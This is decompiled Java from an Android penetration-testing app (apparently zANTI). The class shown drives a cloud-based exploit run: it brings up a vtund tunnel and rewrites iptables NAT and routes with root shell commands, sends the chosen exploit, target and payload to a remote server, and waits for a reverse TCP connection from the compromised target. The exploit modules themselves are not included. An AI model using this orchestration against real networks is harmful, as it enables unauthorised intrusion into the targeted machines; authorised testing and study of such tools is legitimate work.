package com.zimperium.zanti.zetasploit;

import android.util.Log;
import com.fasterxml.jackson.core.util.MinimalPrettyPrinter;
import com.zimperium.zanti.AntiApplication;
import com.zimperium.zanti.Helpers;
import com.zimperium.zanti.R;
import com.zimperium.zanti.ShellPool;
import com.zimperium.zanti.ZHttpInjector.database.HttpRequestLogDB;
import com.zimperium.zanti.zetasploit.ZetasploitExploit;
import com.zimperium.zanti.zetasploit.ZetasploitService;
import java.io.BufferedReader;
import java.io.File;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Iterator;
import java.util.List;
import jcifs.smb.SmbConstants;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.params.HttpConnectionParams;
import org.apache.http.params.HttpParams;

/* loaded from: classes.dex */
public class ExploitController_Server extends ExploitController {
    private String local_port;
    private SetupZetasploitResult setupZetasploitResult;
    private String vtun_device;

    /* JADX INFO: Access modifiers changed from: private */
    /* loaded from: classes.dex */
    public static class SetupZetasploitResult {
        String client_ip;
        String server_ip;
        String tap_if;
        String virtual_ip;

        private SetupZetasploitResult() {
        }
    }

    public ExploitController_Server(ZetasploitService zetasploitService) {
        super(zetasploitService);
    }

    private String getVTUNInterface(List<String> list, List<String> list2) throws Exception {
        if (list == null || list2 == null) {
            throw new Exception(getApplicationContext().getString(R.string.error_listing_available_network_devices));
        }
        ArrayList arrayList = new ArrayList(list2);
        arrayList.removeAll(list);
        if (arrayList.size() != 1) {
            throw new Exception(getApplicationContext().getString(R.string.error_determining_tunnel_device));
        }
        return (String) arrayList.get(0);
    }

    private boolean isBlank(String str) {
        return str == null || str.trim().equals("");
    }

    private void local_clear_vtun() {
        try {
            ShellPool.submitTask(new ShellPool.ShellTask(null, Helpers.getkillall(getApplicationContext()) + "vtund", getApplicationContext()));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private void local_remove_route(String str, String str2) {
        ShellPool.submitTask(new ShellPool.ShellTask(null, "iptables -t nat -D PREROUTING -d " + str + " -j DNAT --to-destination " + str2, getApplicationContext()));
        ShellPool.submitTask(new ShellPool.ShellTask(null, "iptables -t nat -D POSTROUTING -o " + Helpers.getWifiNetDeviceName(this.service) + " -j MASQUERADE", getApplicationContext()));
    }

    private void local_setup_route(SetupZetasploitResult setupZetasploitResult, String str, String str2) throws Exception {
        ShellPool.ShellResult submitTask = ShellPool.submitTask(new ShellPool.ShellTask(null, "iptables -t nat -F", getApplicationContext()));
        if (!submitTask.success) {
            throw new Exception(getApplicationContext().getString(R.string.error_setting_up_local_routing_) + submitTask.resultAsString());
        }
        ShellPool.ShellResult submitTask2 = ShellPool.submitTask(new ShellPool.ShellTask(null, "iptables -t nat -I PREROUTING 1 -d " + setupZetasploitResult.virtual_ip + " -j DNAT --to-destination " + str, getApplicationContext()));
        if (!submitTask2.success) {
            throw new Exception(getApplicationContext().getString(R.string.error_setting_up_local_routing_) + submitTask2.resultAsString());
        }
        ShellPool.ShellResult submitTask3 = ShellPool.submitTask(new ShellPool.ShellTask(null, "iptables -t nat -I POSTROUTING 1 -o " + Helpers.getWifiNetDeviceName(this.service) + " -j MASQUERADE", getApplicationContext()));
        if (!submitTask3.success) {
            throw new Exception(getApplicationContext().getString(R.string.error_setting_up_local_routing_) + submitTask3.resultAsString());
        }
        ShellPool.ShellResult submitTask4 = ShellPool.submitTask(new ShellPool.ShellTask(null, Helpers.getbusybox(this.service) + "route add -host " + setupZetasploitResult.server_ip + " gw " + setupZetasploitResult.client_ip + MinimalPrettyPrinter.DEFAULT_ROOT_VALUE_SEPARATOR + str2, getApplicationContext()));
        if (!submitTask4.success) {
            throw new Exception(getApplicationContext().getString(R.string.error_setting_up_local_routing_) + submitTask4.resultAsString());
        }
    }

    private void remote_execute_exploit(String str, SetupZetasploitResult setupZetasploitResult, int i) throws Exception {
        BufferedReader bufferedReader = null;
        StringBuffer stringBuffer = new StringBuffer();
        try {
            DefaultHttpClient defaultHttpClient = new DefaultHttpClient();
            HttpParams params = defaultHttpClient.getParams();
            HttpConnectionParams.setConnectionTimeout(params, 20000);
            HttpConnectionParams.setSoTimeout(params, 20000);
            HttpPost httpPost = new HttpPost("https://" + this.service.getZetasploitHost() + "/execute_exploit.php");
            ArrayList arrayList = new ArrayList(2);
            arrayList.add(new BasicNameValuePair("exploit_choice_id", this.zState.selectedExploit.id + ""));
            arrayList.add(new BasicNameValuePair("lhost", Helpers.getLocalIpAddress(this.service)));
            arrayList.add(new BasicNameValuePair("lport", "" + i));
            arrayList.add(new BasicNameValuePair("target", this.zState.target));
            arrayList.add(new BasicNameValuePair("local_port", str));
            arrayList.add(new BasicNameValuePair("virtual_ip", setupZetasploitResult.virtual_ip));
            arrayList.add(new BasicNameValuePair("payload", this.zState.selectedPayload.payloadCommand));
            arrayList.add(new BasicNameValuePair("type", "server"));
            arrayList.add(new BasicNameValuePair(HttpRequestLogDB.COLUMN_AUTH_DETAILS, "myauth"));
            Iterator<ZetasploitExploit.ZetasploitExploitParam> it = this.zState.selectedExploit.params.iterator();
            while (it.hasNext()) {
                ZetasploitExploit.ZetasploitExploitParam next = it.next();
                if (next.value != null && !next.value.trim().equals("")) {
                    arrayList.add(new BasicNameValuePair("param_" + next.name, next.value.trim()));
                }
            }
            httpPost.setEntity(new UrlEncodedFormEntity(arrayList));
            BufferedReader bufferedReader2 = new BufferedReader(new InputStreamReader(defaultHttpClient.execute(httpPost).getEntity().getContent()));
            while (true) {
                try {
                    String readLine = bufferedReader2.readLine();
                    if (readLine == null) {
                        throw new Exception("No OK received");
                    }
                    Log.i("zetasploit line", readLine);
                    String[] split = readLine.split("::::::", 2);
                    if (split.length == 2) {
                        if (!split[0].equals("OK")) {
                            throw new Exception("No OK received: " + split[1]);
                        }
                        this.zetasploitProgress.last_msf_result = stringBuffer.toString();
                        try {
                            bufferedReader2.close();
                            return;
                        } catch (Exception e) {
                            return;
                        }
                    }
                    if (readLine.contains("[-] Exploit failed")) {
                        this.zetasploitProgress.didFail = true;
                        notifyUpdateProgress(readLine);
                    }
                    stringBuffer.append(readLine + "\n");
                } catch (Throwable th) {
                    th = th;
                    bufferedReader = bufferedReader2;
                    this.zetasploitProgress.last_msf_result = stringBuffer.toString();
                    try {
                        bufferedReader.close();
                    } catch (Exception e2) {
                    }
                    throw th;
                }
            }
        } catch (Throwable th2) {
            th = th2;
        }
    }

    private SetupZetasploitResult remote_setup_exploit(String str) throws Exception {
        BufferedReader bufferedReader = null;
        try {
            DefaultHttpClient defaultHttpClient = new DefaultHttpClient();
            HttpParams params = defaultHttpClient.getParams();
            HttpConnectionParams.setConnectionTimeout(params, 20000);
            HttpConnectionParams.setSoTimeout(params, 20000);
            HttpPost httpPost = new HttpPost("https://" + this.service.getZetasploitHost() + "/setup_exploit.php");
            ArrayList arrayList = new ArrayList(2);
            arrayList.add(new BasicNameValuePair("exploit_choice_id", this.zState.selectedExploit.id + ""));
            arrayList.add(new BasicNameValuePair("lhost", Helpers.getLocalIpAddress(this.service)));
            arrayList.add(new BasicNameValuePair("target", this.zState.target));
            arrayList.add(new BasicNameValuePair("local_port", str));
            httpPost.setEntity(new UrlEncodedFormEntity(arrayList));
            BufferedReader bufferedReader2 = new BufferedReader(new InputStreamReader(defaultHttpClient.execute(httpPost).getEntity().getContent()));
            try {
                SetupZetasploitResult setupZetasploitResult = new SetupZetasploitResult();
                while (true) {
                    String readLine = bufferedReader2.readLine();
                    if (readLine == null) {
                        break;
                    }
                    Log.i("zetasploit line", readLine);
                    String[] split = readLine.split(":", 2);
                    if (split.length == 2) {
                        if (split[0].equals("virtual_ip")) {
                            setupZetasploitResult.virtual_ip = split[1];
                        } else if (split[0].equals("server_ip")) {
                            setupZetasploitResult.server_ip = split[1];
                        } else if (split[0].equals("client_ip")) {
                            setupZetasploitResult.client_ip = split[1];
                        } else if (split[0].equals("tap_if")) {
                            setupZetasploitResult.tap_if = split[1];
                        }
                    }
                }
                if (isBlank(setupZetasploitResult.virtual_ip) || isBlank(setupZetasploitResult.client_ip) || isBlank(setupZetasploitResult.server_ip)) {
                    throw new Exception(getApplicationContext().getString(R.string.did_not_receive_correct_tunnel_parameters_from_the_server));
                }
                try {
                    bufferedReader2.close();
                } catch (Exception e) {
                }
                return setupZetasploitResult;
            } catch (Throwable th) {
                th = th;
                bufferedReader = bufferedReader2;
                try {
                    bufferedReader.close();
                } catch (Exception e2) {
                }
                throw th;
            }
        } catch (Throwable th2) {
            th = th2;
        }
    }

    private void setup_vtun_device_ip(SetupZetasploitResult setupZetasploitResult, String str) throws Exception {
        ShellPool.ShellResult submitTask = ShellPool.submitTask(new ShellPool.ShellTask(null, "ifconfig " + str + MinimalPrettyPrinter.DEFAULT_ROOT_VALUE_SEPARATOR + setupZetasploitResult.client_ip + " pointopoint " + setupZetasploitResult.server_ip + " mtu 1450 netmask 255.255.0.0", getApplicationContext()));
        if (!submitTask.success) {
            throw new Exception(getApplicationContext().getString(R.string.error_setting_up_local_tunnel_device_) + submitTask.resultAsString());
        }
    }

    private String startVTUN() throws Exception {
        ShellPool.submitTask(new ShellPool.ShellTask(null, "sysctl -w net.ipv4.ip_forward=1", getApplicationContext()));
        ShellPool.submitTask(new ShellPool.ShellTask(null, "echo '1' > /proc/sys/net/ipv4/ip_forward", getApplicationContext()));
        ShellPool.ShellResult submitTask = ShellPool.submitTask(new ShellPool.ShellTask(AntiApplication.DIR_VTUN, "./vtund -f vtun.conf my_tunnel " + this.service.getZetasploitHost(), getApplicationContext()));
        if (!submitTask.success) {
            throw new Exception("Error executing vtun: " + submitTask.resultAsString());
        }
        int i = 0;
        while (i < 15) {
            i++;
            Thread.sleep(SmbConstants.DEFAULT_SSN_LIMIT);
            try {
                for (String str : ShellPool.submitTask(new ShellPool.ShellTask(AntiApplication.DIR_UTILS, "./busybox netstat -natp | ./busybox grep vtund | ./busybox awk '{print $4}'", true, true, getApplicationContext())).result) {
                    Log.i("zetasploit vtun result", str);
                    String[] split = str.split(":");
                    if (split.length == 2) {
                        return split[1];
                    }
                }
            } catch (Exception e) {
            }
        }
        throw new Exception(getApplicationContext().getString(R.string.error_executing_vtun_timeout_expired_retieving_local_port));
    }

    @Override // com.zimperium.zanti.zetasploit.ExploitController
    public void cleanup() {
        try {
            local_clear_vtun();
        } catch (Exception e) {
        }
        try {
            local_remove_route(this.setupZetasploitResult.virtual_ip, this.zState.target);
        } catch (Exception e2) {
        }
    }

    @Override // com.zimperium.zanti.zetasploit.ExploitController
    public void runExploitProcess() throws Exception {
        notifyUpdateProgress(getApplicationContext().getString(R.string.starting_cloud_based_exploit_process_));
        Log.i("zzetasploit", "runExploitProcess local_clear_vtun");
        local_clear_vtun();
        Log.i("zzetasploit", "runExploitProcess sleep(500)");
        Thread.sleep(500L);
        notifyUpdateProgress(getApplicationContext().getString(R.string.setting_up_secured_connection_));
        List<String> asList = Arrays.asList(new File("/sys/class/net").list());
        Log.i("zzetasploit", "runExploitProcess existingDevices: " + asList.size());
        Log.i("zzetasploit", "runExploitProcess startVTUN");
        this.local_port = startVTUN();
        Log.i("zzetasploit", "runExploitProcess local_port: " + this.local_port);
        int i = 0;
        while (true) {
            try {
                Thread.sleep(5000L);
                List<String> asList2 = Arrays.asList(new File("/sys/class/net").list());
                Log.i("zzetasploit", "runExploitProcess getVTUNInterface existingDevices: " + asList.size());
                this.vtun_device = getVTUNInterface(asList, asList2);
                Log.i("zzetasploit", "runExploitProcess vtun_device: " + this.local_port);
                int i2 = 0;
                while (true) {
                    try {
                        Thread.sleep(1000L);
                        notifyUpdateProgress(getApplicationContext().getString(R.string.setting_up_exploit) + (i2 == 0 ? "" : " (retry: " + i2 + ")"));
                        this.setupZetasploitResult = remote_setup_exploit(this.local_port);
                        setup_vtun_device_ip(this.setupZetasploitResult, this.vtun_device);
                        local_setup_route(this.setupZetasploitResult, this.zState.target, this.vtun_device);
                        int start_local_reverse_tcp_listener = this.service.start_local_reverse_tcp_listener();
                        notifyUpdateProgress(getApplicationContext().getString(R.string.starting_cloud_exploit_on_) + this.zState.target + "...");
                        remote_execute_exploit(this.local_port, this.setupZetasploitResult, start_local_reverse_tcp_listener);
                        if (this.zetasploitProgress.didFail) {
                            notifyUpdateProgress(this.zetasploitProgress.currentStatus);
                            this.service.stopSelf();
                            return;
                        }
                        if (this.zetasploitProgress.didFail || this.zetasploitProgress.didSucceed || this.zetasploitProgress.isUploadingPayload) {
                            return;
                        }
                        notifyUpdateProgress(getApplicationContext().getString(R.string.waiting_for_connection_from_target_) + this.zState.target + "...");
                        this.zetasploitProgress.wait_seconds_remaining = 30;
                        while (this.zetasploitProgress.wait_seconds_remaining > 0) {
                            Thread.sleep(1000L);
                            if (this.zetasploitProgress.didFail || this.zetasploitProgress.didSucceed || this.zetasploitProgress.isUploadingPayload) {
                                return;
                            }
                            ZetasploitService.ZetasploitProgress zetasploitProgress = this.zetasploitProgress;
                            zetasploitProgress.wait_seconds_remaining--;
                            notifyUpdateProgress(getApplicationContext().getString(R.string.waiting_) + this.zetasploitProgress.wait_seconds_remaining + getApplicationContext().getString(R.string._seconds_for_an_exploit_response_));
                        }
                        if (this.zetasploitProgress.didSucceed) {
                            return;
                        }
                        this.zetasploitProgress.didFail = true;
                        notifyUpdateProgress(getApplicationContext().getString(R.string.cloud_exploit_failed_no_connection_from_target_));
                        this.service.stopSelf();
                        return;
                    } catch (Exception e) {
                        if (i2 > 15) {
                            throw e;
                        }
                        i2++;
                    }
                }
            } catch (Exception e2) {
                if (i > 15) {
                    throw e2;
                }
                i++;
            }
        }
    }
}
